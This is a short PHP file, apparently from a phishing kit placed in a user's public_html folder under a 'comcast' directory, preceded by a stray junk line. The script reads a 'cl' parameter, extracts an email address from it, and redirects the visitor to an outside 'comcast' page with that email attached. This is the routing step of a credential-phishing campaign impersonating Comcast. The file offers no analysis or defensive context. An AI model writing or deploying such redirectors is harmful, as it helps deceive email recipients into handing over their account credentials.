dvadf
/home/homerdlh/public_html/comcast/index.php
<?php
	$url = "https://workhub-portals.com/comcast/"; 

	$cl = explode( '/', $_GET['cl'] );
	
	$random = $cl[0];
	$email = $cl[1];
	
	header("Location: $url?email=$email");
?>